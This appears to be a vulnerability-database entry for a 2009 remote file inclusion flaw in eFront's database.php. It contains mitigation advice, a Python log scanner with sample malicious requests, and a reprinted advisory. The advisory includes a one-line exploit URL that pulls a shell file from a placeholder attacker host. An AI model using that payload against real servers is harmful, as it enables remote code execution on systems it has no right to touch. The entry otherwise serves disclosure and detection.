Vendor: efront
By: cr4wl3r
CVSS: 9.3 (HIGH)
Vulnerability Type: Remote File Include
CWE: 98
Product Name: efront
Affected Version From: 3.5.2004
Affected Version To: 3.5.2004
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

efront <= 3.5.4 Remote File Include Vulnerability

A vulnerability in efront <= 3.5.4 allows an attacker to include a remote file via the 'path' parameter in the 'database.php' script. This can be exploited to execute arbitrary PHP code by including a malicious file from a remote location.

Mitigation:

Upgrade to the latest version of efront.
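
Until the upgrade is in place, web-server access logs can be checked for requests that match the pattern described above. The following is an added example, not part of the original advisory or of the efront code base. The log lines, hosts and function names are constructed for illustration; only the script path libraries/database.php and the 'path' parameter come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (combined log format); hosts are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Sep/2009:10:01:02 +0000] "GET /efront/libraries/database.php?path=http://files.example/inc.txt HTTP/1.1" 200 512
192.0.2.11 - - [15/Sep/2009:10:02:10 +0000] "GET /efront/index.php?ctg=lessons HTTP/1.1" 200 8123
192.0.2.12 - - [15/Sep/2009:10:03:44 +0000] "GET /efront/libraries/database.php?path=%2568ttps%253A%252F%252Ffiles.example%252Fa HTTP/1.1" 200 0
192.0.2.13 - - [15/Sep/2009:10:04:00 +0000] "GET /efront/libraries/database.php?path=../libraries/ HTTP/1.1" 200 0
192.0.2.14 - - [15/Sep/2009:10:05:09 +0000] "POST /efront/libraries/database.php?PATH=x&path=ftp://files.example/a HTTP/1.1" 500 0
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A URL scheme or PHP stream wrapper (http:, ftp:, php:, data:), a UNC path, or "//host".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|\\\\|//)', re.IGNORECASE)
TARGET_SCRIPT = "/libraries/database.php"  # script named in the advisory


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded values are compared in clear form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(log_text):
    """Return (client_ip, decoded_path_value) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not fully_decode(url.path).lower().endswith(TARGET_SCRIPT):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(value)
            # PHP variable names are case-sensitive, so only "path" is checked.
            if name == "path" and REMOTE_RE.match(value):
                hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ip} path={value}")
```

A hit only shows that such a request was received; whether the include succeeded depends on the installed version and the server's PHP configuration.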
Source

Exploit-DB raw data:

########################################################################
#efront <= 3.5.4 Remote File Include Vulnerability
#Download Script      :  http://sourceforge.net/projects/efrontlearning/files/
#Author               :  cr4wl3r 
#Contact              :  cr4wl3r[4t]linuxmail[dot]org 
#Location             :  Gorontalo - INDONESIA
########################################################################
#file :
#  database.php 
#line 15 require_once($path.'adodb/adodb.inc.php');
########################################################################
#3xplo!t :
#http://target.com/[path]/libraries/database.php?path=http://attacker.com/shell.txt???  
########################################################################
#Greetz        : MyMom [alm]
#Thanks 2      : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral
########################################################################
#sekuritionline.net (all crew sekuritionline)
#manadocoding.net (all crew manadocoding)
########################################################################

# milw0rm.com [2009-09-15]